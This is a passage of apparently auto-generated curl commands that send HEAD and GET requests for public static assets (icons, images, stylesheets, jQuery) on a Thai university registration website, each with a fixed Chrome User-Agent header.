  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/images/icons/announce-book.svg' \
  -H \
  'Content-Type: image/svg+xml' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/images/logo-md.svg' \
  -H \
  'Content-Type: image/svg+xml' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/images/icons/infocovid/4.svg' \
  -H \
  'Content-Type: image/svg+xml' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/images/icons/infocovid/5.svg' \
  -H \
  'Content-Type: image/svg+xml' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/dist/css/style.css?v=20240131_1' \
  -H \
  'Content-Type: text/css' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/components/animate.css/animate.min.css' \
  -H \
  'Content-Type: text/css' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/images/icons/announce-calendar-2.svg' \
  -H \
  'Content-Type: image/svg+xml' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/images/icons/service-room.svg' \
  -H \
  'Content-Type: image/svg+xml' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/uploads/news_picture/thumbnail/68fb32a9b6a29.png' \
  -H \
  'Content-Type: image/png' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/images/icons/mail.svg' \
  -H \
  'Content-Type: image/svg+xml' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/styles/main.css' \
  -H \
  'Content-Type: text/html; charset=UTF-8' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/components/@fortawesome/fontawesome-free/css/all.min.css?v=20220911' \
  -H \
  'Content-Type: text/css' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/images/logo-login.png' \
  -H \
  'Content-Type: image/png' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/images/icons/announce-fee.svg' \
  -H \
  'Content-Type: image/svg+xml' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/uploads/content_picture/thumbnail/5f22445c6dd0e.png' \
  -H \
  'Content-Type: image/png' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/images/icons/user.svg' \
  -H \
  'Content-Type: image/svg+xml' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/components/swiper/swiper-bundle.min.css?v=20221019' \
  -H \
  'Content-Type: text/css' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/images/icons/infocovid/2.svg' \
  -H \
  'Content-Type: image/svg+xml' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/images/logo-login.png' \
  -H \
  'Content-Type: image/png' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/dist/css/home.css?v=20240418_1' \
  -H \
  'Content-Type: text/css' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/components/jquery/dist/jquery.min.js?v=3.4.1' \
  -H \
  'Content-Type: application/javascript; charset=utf-8' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

